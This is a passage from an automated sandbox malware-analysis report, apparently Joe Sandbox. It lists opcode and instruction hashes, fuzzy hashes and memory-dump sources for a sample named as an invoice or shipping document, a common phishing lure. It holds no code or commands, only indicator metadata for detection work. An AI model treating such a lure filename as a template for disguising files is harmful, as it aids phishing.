                                              • API String ID:
                                              • Opcode ID: eeaefd192dd226e49d6ba115a3c08b27ae86133d5a28a5f5c6e2abacfa066124
                                              • Instruction ID: 64364015299dfff75d1a0b571094d6025ad52117a1874de58d0c8b7be54e5977
                                              • Opcode Fuzzy Hash: eeaefd192dd226e49d6ba115a3c08b27ae86133d5a28a5f5c6e2abacfa066124
                                              • Instruction Fuzzy Hash: 7D01DE21B1CD1A0BA76CBA1CA4401B9F3C2EF4873079446BEC40EC328ACD68B8424285
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4d06bd95437c274dda14cc4f2f1f77d3a2feb2124f29fa2e23de1bb605a31667
                                              • Instruction ID: 7a2616255fd1c213ce755e65f2542d3a27693bf25c58d01eeb15a0f04d753c9e
                                              • Opcode Fuzzy Hash: 4d06bd95437c274dda14cc4f2f1f77d3a2feb2124f29fa2e23de1bb605a31667
                                              • Instruction Fuzzy Hash: 3E11A030A1DD4B5FD759EB2984506A5B3E2FF94360B948679D00EC2285CE38F8568790
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 384fc2275cca471a355f2f0486c0769fdd6cdfd699fa9545d26edf4fab4a97ca
                                              • Instruction ID: f353b6712b9dbdb39e1daa955e081178669f3a7a7396fd14d882ff1d3a434e9d
                                              • Opcode Fuzzy Hash: 384fc2275cca471a355f2f0486c0769fdd6cdfd699fa9545d26edf4fab4a97ca
                                              • Instruction Fuzzy Hash: 87012421A1DE5B0BE771BA5D78A02B7F7D1EF46370FC40636E80CC2182DC98E84582B1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 55f1f59acc1b65354da43f1eaeee41a8c59a3e1c086caf3ab6d5b7447320d6c1
                                              • Instruction ID: 06eba59fbfb52092036e982aa188623bca76491ede79435ddd34ade9f46e1195
                                              • Opcode Fuzzy Hash: 55f1f59acc1b65354da43f1eaeee41a8c59a3e1c086caf3ab6d5b7447320d6c1
                                              • Instruction Fuzzy Hash: D001DF21B1DD5A0B9B6CBB1CA4411B9F3D2EF4833079846BFD40EC328BCD6CB8128285
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b1006b2f81b63145bfe85f0adff16d4ab9c0b111a2858eeabdb028526a489d60
                                              • Instruction ID: d5fb2502c6ccc299ce9fd0fc4bb5e15f457446d42119c6c6a8d566ebd707b704
                                              • Opcode Fuzzy Hash: b1006b2f81b63145bfe85f0adff16d4ab9c0b111a2858eeabdb028526a489d60
                                              • Instruction Fuzzy Hash: 0301F12191DE5B0BE771BA6D38A02B7B7D1EF46370FC40636E80CC2282DC98F84182B1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0e575bf4bf9cbe676df6a08195690f001cf3ac713efbdb98f9c9b5e056113d3d
                                              • Instruction ID: 771d346568fbba645e684db8eafdbf15a887f345dc579fabee8f0b91d7612f96
                                              • Opcode Fuzzy Hash: 0e575bf4bf9cbe676df6a08195690f001cf3ac713efbdb98f9c9b5e056113d3d
                                              • Instruction Fuzzy Hash: 8801003160CB148FCB45EB28C004AAAB7E1FF89320F448A7AE449D7260CE74E884C7C2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f7d46117c83bc245a81af068361cbef9170490d6e98e2ae07b6287d354fb9325
                                              • Instruction ID: e540f145260eb769f9b353f3f5b913b7cc103b6f61fcb7f64da2eaeb7c81cb2d
                                              • Opcode Fuzzy Hash: f7d46117c83bc245a81af068361cbef9170490d6e98e2ae07b6287d354fb9325
                                              • Instruction Fuzzy Hash: 9301D121B2CD164BA76CB72968895B6B2D0FFA8365750447EF41FC36C7DD24B8068784
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 516c92affb27d9a6e712e4e2bc208a2b67e7e297801cc69d6e4988cd9d659cc8
                                              • Instruction ID: 86a66e48415a766ccc2b36fe18263589eb74284f72a152ff67fbd11acc22abbd
                                              • Opcode Fuzzy Hash: 516c92affb27d9a6e712e4e2bc208a2b67e7e297801cc69d6e4988cd9d659cc8
                                              • Instruction Fuzzy Hash: 0B01DF21B1D95A0B972CBA1CA4411BAF3C1EF4833079446BFD05FC328BCD68B8538285
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0fbf779faf1544cbb9eb12cfab73c3f9438ad2fb64c71228fa339406806c2dad
                                              • Instruction ID: 0f54f5429118b59ceb52f7822a483eee10249ae36a318ca8eb8ff6214b54cf25
                                              • Opcode Fuzzy Hash: 0fbf779faf1544cbb9eb12cfab73c3f9438ad2fb64c71228fa339406806c2dad
                                              • Instruction Fuzzy Hash: 04018F21A1DD560B976CBB1CA4411B9F3D1EF4833079446BED45EC328BCD68B8528285
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1075277306dc97ad891fd4ca77863f2e2de9c6f69ab8e1d716576ba6af551606
                                              • Instruction ID: f187e801aaee5227e4ea8a11dac0b339032d24097aa1152289828002741436e0
                                              • Opcode Fuzzy Hash: 1075277306dc97ad891fd4ca77863f2e2de9c6f69ab8e1d716576ba6af551606
                                              • Instruction Fuzzy Hash: 0E014B21B1CD1A4B966CBA1CA4511A9B3D1EF8873079446BED44EC328ADD68B9524289
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c9eba1ff73ca604f8a47f696880a62a73c8968751d2dde3a458f5085968476dd
                                              • Instruction ID: 4413fb75783220a6c9697f1a2c62401629d4c48b56f6978d83a1b0b18d000f05
                                              • Opcode Fuzzy Hash: c9eba1ff73ca604f8a47f696880a62a73c8968751d2dde3a458f5085968476dd
                                              • Instruction Fuzzy Hash: A0014F21B1CD1A4B966CBA1CA4411B9B3D1EF8873079446BEE44EC328BDD68B8524285
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 113462d2bbd35fca72a61edaf54923a3b041fe7c868f50a86e10e9df9b7d97fb
                                              • Instruction ID: df7f5d2c1161aa4a50c8edc347c9b52e4db83cac5d46e15ee9042b1de4cdf060
                                              • Opcode Fuzzy Hash: 113462d2bbd35fca72a61edaf54923a3b041fe7c868f50a86e10e9df9b7d97fb
                                              • Instruction Fuzzy Hash: 72018B21A1D95A0B976CBA1CA4411B9F3D1EF8833079846BED45EC338BCD6CB8528285
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1261f03c09f1b81cfde6f5ecf5d2cfe0782984db37baab844046c8737d60d396
                                              • Instruction ID: 645f304e9ff7a61511beb689c3b982d3f31d3f7a5d3d9815e496c439e60a295a
                                              • Opcode Fuzzy Hash: 1261f03c09f1b81cfde6f5ecf5d2cfe0782984db37baab844046c8737d60d396
                                              • Instruction Fuzzy Hash: 89016D21B1CD1A0B966DBB1CB4411B9F3D1EF8873079446BED45EC328BDD69B85342C9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 51d6652714db449a29dae4eef3430347ed6b7fd78c08a26c17d0c8104f82d667
                                              • Instruction ID: bf01351cd39e4a68b90b3b34b7f4eb78efa313a22fad67d5499ac63023f286c1
                                              • Opcode Fuzzy Hash: 51d6652714db449a29dae4eef3430347ed6b7fd78c08a26c17d0c8104f82d667
                                              • Instruction Fuzzy Hash: BC016221B1CD1A4B9A6CBF1CA4411A9B3D1EF8873079442BED44EC32CBDD68B9564685
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 78604b0d428093cdfc16fb5d37395a22eacd4dbd724cebb5c5ceda0faf543b91
                                              • Instruction ID: a697e186a0a850741650fda969ccfe531ab15b37de7033bd4bd9df910030aa37
                                              • Opcode Fuzzy Hash: 78604b0d428093cdfc16fb5d37395a22eacd4dbd724cebb5c5ceda0faf543b91
                                              • Instruction Fuzzy Hash: 6C01F96460CB161BE728591E945977BB6C5EF89771F8D013EE88EC31C2DE68EC5092A0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cf5db2635d4dfe05260f72e0b5a95fcfcff0d48c0169acbd4a136c921e4a8dcd
                                              • Instruction ID: e5a738bcc745f0c56b67b4de22e885e96d9c9d94e5dbabaa10f0f0110c19d448
                                              • Opcode Fuzzy Hash: cf5db2635d4dfe05260f72e0b5a95fcfcff0d48c0169acbd4a136c921e4a8dcd
                                              • Instruction Fuzzy Hash: 25017311B4D95A07DB58F77C78546F9A791EF85331B88437AE508C61C7CD48B88283D0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5608c72137a7e274b7a42fc685b73e050ae1c87573e192978f3f397378f055cc
                                              • Instruction ID: 6a16a0bcbc2f921898372e0fdfd66e1d65b0af78cadb4bc2fd4c0d8c2fcf229c
                                              • Opcode Fuzzy Hash: 5608c72137a7e274b7a42fc685b73e050ae1c87573e192978f3f397378f055cc
                                              • Instruction Fuzzy Hash: E611A32080CFD549F770AA689055371FBC0DF16338F8805BCC88A826C2CADDB8D6C361
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 782d770d07f0f7f8226f09c8c08221234c90bcf8f8452e81fbbdb26241b918d8
                                              • Instruction ID: 8e39ae90e9a05406e28f03700ac55a02a6352e5ab871b0dadb2e5686b2ae3c43
                                              • Opcode Fuzzy Hash: 782d770d07f0f7f8226f09c8c08221234c90bcf8f8452e81fbbdb26241b918d8
                                              • Instruction Fuzzy Hash: 80F0F021B0C91A0FEBA8EAADB4946B8B6D1EF8833274500BAE40DC7195E994CCD543C0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fbb07b79944c7ef5f6e69dc369ad361ea7c622529195f57cf7bd8158fdaf9007
                                              • Instruction ID: 8e2666a8c86a30d19aa17fac5ac1b138d9849b134f6dc042baed739f50e7d49c
                                              • Opcode Fuzzy Hash: fbb07b79944c7ef5f6e69dc369ad361ea7c622529195f57cf7bd8158fdaf9007
                                              • Instruction Fuzzy Hash: 86F0A421B1CD1A4B966CBB1CB4411A9F3D1EF8873079446BFD44EC328BDD69B85342C5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 415d5a73448c162714c855a69fe55278aec472af85d84873d15af048eacc13d1
                                              • Instruction ID: 7d8af81067f673ff416e823fe4f64dda14dc89fc669fcc019846b700f61080ae
                                              • Opcode Fuzzy Hash: 415d5a73448c162714c855a69fe55278aec472af85d84873d15af048eacc13d1
                                              • Instruction Fuzzy Hash: 4DF08121B1CD1A4B966CBB1CA4411A9B3D1EF4833079446BED44EC328BDE69B8534285
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 74711d72594633d17ef39aa9f1c48183f75df7d553f502d0030b510db36736d4
                                              • Instruction ID: b3cf56d1dd964ea22261929c679ff3b0ec63770e807761e84995d5137c00cae6
                                              • Opcode Fuzzy Hash: 74711d72594633d17ef39aa9f1c48183f75df7d553f502d0030b510db36736d4
                                              • Instruction Fuzzy Hash: 9CF08121B1CD1A4B976CBA0CB4411A9B3D2EF58730794417ED44EC338BDE68B85686C5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fede9dce00e35e8c07c1e599300cca88c5999b1df648172fc5aff28b3c5f079d
                                              • Instruction ID: bb9a578f2669d2d74d80ab05f9bdf3e9d92b54b5d274d55002ca50f22c62a89e
                                              • Opcode Fuzzy Hash: fede9dce00e35e8c07c1e599300cca88c5999b1df648172fc5aff28b3c5f079d
                                              • Instruction Fuzzy Hash: 5601D12081D6D68FD7126B30041A5A5BBE0AF03220BAA05FAE045CF0EBD95D6C168792
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1f484efaed0655ee3fdd48adfeba35ee144fcce8604ef9c1f03908fa82fcb4b8
                                              • Instruction ID: 2b0a071cb980c1d411df6d024eb057e2267097033380d284322ea8502ebc3e3b
                                              • Opcode Fuzzy Hash: 1f484efaed0655ee3fdd48adfeba35ee144fcce8604ef9c1f03908fa82fcb4b8
                                              • Instruction Fuzzy Hash: EFF06D30718E094FE7A8FA6D9494672B2D2FBAC3267A4027DD40DC339ADD69E8438350
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3105e0b35d74287c3d06ac8419cfceb9567cfe8c4c552b81bed68863c2459649
                                              • Instruction ID: ec269c5a623dac8ddc13e05655b13faefb09174ce2bc35bd1369222ecde4c7c9
                                              • Opcode Fuzzy Hash: 3105e0b35d74287c3d06ac8419cfceb9567cfe8c4c552b81bed68863c2459649
                                              • Instruction Fuzzy Hash: 18F08121F1CD160B9B6DBA08A4414BAF3D1EF4833079445BED04EC32CBCD68B8468285
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 14942fe769bdf2bad9bfa9e5306af6d4076d283ae9382278d4ea6cebe43a8054
                                              • Instruction ID: fe06ac2584a7f3dd8f13df2b57e2ee06a28c4b5efefd5595ceafea97c37af447
                                              • Opcode Fuzzy Hash: 14942fe769bdf2bad9bfa9e5306af6d4076d283ae9382278d4ea6cebe43a8054
                                              • Instruction Fuzzy Hash: 99F0DA30708C0E8F9BD4FB1CE468A29B3E6EFA932179901B6E40DC7265DE64DC51C791
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2df5bd8ca7af4cd7b945499a71ae449cc6ec17c4702a13a29803d9bb3f2d7376
                                              • Instruction ID: a7b9950126e5f6f913a8cfe5cdc625f5c65d3068beea0ad28055451c4702c309
                                              • Opcode Fuzzy Hash: 2df5bd8ca7af4cd7b945499a71ae449cc6ec17c4702a13a29803d9bb3f2d7376
                                              • Instruction Fuzzy Hash: B2F0FF21A1DE5A0B9B2CBA18A4410B9F3D2EF4833079442BFD44EC338BDD68B8428285
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f759b3f2d2df51def6c15dd8537e52658cdf9c0638da089894f8db0617ea0fe4
                                              • Instruction ID: 1f718036dc3e996db0cf0b9508550d297a3b563285d37b0c38a7833f22b06415
                                              • Opcode Fuzzy Hash: f759b3f2d2df51def6c15dd8537e52658cdf9c0638da089894f8db0617ea0fe4
                                              • Instruction Fuzzy Hash: 96F0A421B1CD1A4B966CFB0CA4411A9B3D1EF88730794457ED05EC328BCE68B85742C5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c62492206d195bd414ce7a1ac00297feea4104de85fab82b8e5cf76ff38364e3
                                              • Instruction ID: 3da8715dbb8da002bd39b98fa472a350140d6f7f02670adf7719bab698c44835
                                              • Opcode Fuzzy Hash: c62492206d195bd414ce7a1ac00297feea4104de85fab82b8e5cf76ff38364e3
                                              • Instruction Fuzzy Hash: 08F0283051CA016FE35CAB19844AABAB7D4FBA9361F50002EF08E83293CDB0780187A2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 571312c9afffb96ca493ea60e48d3a2903c6fd1372c8822811a3213a27cdbb2e
                                              • Instruction ID: 58839ceb8dfc9eb51211d1225557fda3964d0a879ea167bc59320485e401f9bc
                                              • Opcode Fuzzy Hash: 571312c9afffb96ca493ea60e48d3a2903c6fd1372c8822811a3213a27cdbb2e
                                              • Instruction Fuzzy Hash: 56F0EC2061CD0E8FEF84FB2DC455964B3E1FF583647A446B8D40EC7292EA56E896CB50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 51eb5ee8a503b0237d73907e1acb804974fafd46cfa7a18f740a6bff84e41a89
                                              • Instruction ID: a574263553273178630327e0ddefb15d538ba0449ebdfea18f0f74ebe87277fc
                                              • Opcode Fuzzy Hash: 51eb5ee8a503b0237d73907e1acb804974fafd46cfa7a18f740a6bff84e41a89
                                              • Instruction Fuzzy Hash: EF016D3091DBCD4FEB46EF288C581A9BFF0FF55200B8405EBD858C72A2DE7959148741
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8bc3f4452d3aeb0c6ca284ac2cef2e9261fb36a2cce2ae702b5735fef000d6af
                                              • Instruction ID: edb353443c464cc9ad8513cbedb0e98d6116d3d8b16a4178addd7bcf488b0ed1
                                              • Opcode Fuzzy Hash: 8bc3f4452d3aeb0c6ca284ac2cef2e9261fb36a2cce2ae702b5735fef000d6af
                                              • Instruction Fuzzy Hash: A0E02211B1D84653676479AD38892B986C6CFDC2387980133E10CC3287DC88686243A1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f2e0507d8a784ce1fa8c8d0f17078baa0193fe9bfd9d96ccabc671535742006d
                                              • Instruction ID: 758b34264f5616f55cf4fbe2796289f9754a93f9f8672cf49103b897bdb343e9
                                              • Opcode Fuzzy Hash: f2e0507d8a784ce1fa8c8d0f17078baa0193fe9bfd9d96ccabc671535742006d
                                              • Instruction Fuzzy Hash: 0CF05C3150CE090AF764643A5C54675BFC9DF54271F50013BD449C2191CA99E481C6A0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7ef04f3e5c3f910bd88d6b40b4974ff782cdf94155272dde228c0c1b7b3bc456
                                              • Instruction ID: 231080260bc682c63f645debceec4cca90ceaf57976b95546099b531e3f4df23
                                              • Opcode Fuzzy Hash: 7ef04f3e5c3f910bd88d6b40b4974ff782cdf94155272dde228c0c1b7b3bc456
                                              • Instruction Fuzzy Hash: E9F0BE01C1CE6609F7B6756920543BAAAD2DB11230F8816B6DC89C55C1D98CF8E583A1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ade2974eaa8b37484afa1069e8175d1f4eb421dcc9cc41544b095c0c98f3b4a1
                                              • Instruction ID: 2bf61ef16dc446d2786876ea1a49b5a49ff7ebf2c3cc41ff951a2c3b6083690d
                                              • Opcode Fuzzy Hash: ade2974eaa8b37484afa1069e8175d1f4eb421dcc9cc41544b095c0c98f3b4a1
                                              • Instruction Fuzzy Hash: C9E09B31D1DC1546B774792824612F867D1DF86374BE40576D44DC628ACD997C938291
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
